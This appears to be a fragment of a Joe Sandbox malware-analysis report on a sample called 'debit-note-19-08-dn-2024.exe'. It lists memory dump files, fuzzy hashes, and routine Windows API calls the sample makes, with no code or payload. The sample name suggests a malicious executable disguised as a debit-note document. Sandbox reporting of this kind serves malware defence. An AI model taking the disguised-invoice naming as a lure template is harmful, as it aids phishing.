                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: Free$GlobalLibrary
                                • String ID: C:\Users\user\AppData\Local\Temp\
                                • API String ID: 1100898210-3355392842
                                • Opcode ID: dd483a302f27d7fd5815fa17d0cc140b668f4dc35d1ba6fe7e243829f05c23e7
                                • Instruction ID: 78adfbc6f23a2b3c20b59446217b09faef23a1eee4c9d5cf742f1d2697954a66
                                • Opcode Fuzzy Hash: dd483a302f27d7fd5815fa17d0cc140b668f4dc35d1ba6fe7e243829f05c23e7
                                • Instruction Fuzzy Hash: 2FE08C339041205BC621AF25AC08B1AB7A86F89B32F0581B6F9807B2A183746C624BD9
                                APIs
                                • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe,C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe,80000000,00000003), ref: 004059E5
                                • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe,C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe,80000000,00000003), ref: 004059F5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: CharPrevlstrlen
                                • String ID: C:\Users\user\Desktop
                                • API String ID: 2709904686-3370423016
                                • Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                • Instruction ID: c27c0225baf4744af390cb43684771b46df34b65c4403afa93d532b781e968ba
                                • Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                • Instruction Fuzzy Hash: A8D05EB3400920DAD3226B04DC0199F73ACEF1131074644AAF501A21A5DB785D808BBD
                                APIs
                                • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                • GlobalFree.KERNEL32(?), ref: 10001203
                                Memory Dump Source
                                • Source File: 00000000.00000002.11419527256.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.11419505388.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000000.00000002.11419552183.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000000.00000002.11419574238.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: Global$Free$Alloc
                                • String ID:
                                • API String ID: 1780285237-0
                                • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                APIs
                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
                                • lstrcmpiA.KERNEL32(00405D53,00000000), ref: 00405B41
                                • CharNextA.USER32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B52
                                • lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: lstrlen$CharNextlstrcmpi
                                • String ID:
                                • API String ID: 190613189-0
                                • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                • Instruction ID: 19ad592fd5dcf9c9bc99336752ee576fec3eb52e2d0cc5b6bc7cc78b570e8094
                                • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                • Instruction Fuzzy Hash: 5FF06231A04958AFC7129BA5DD4099FBBB8EF06350B2540A6F801F7251D674FE019BA9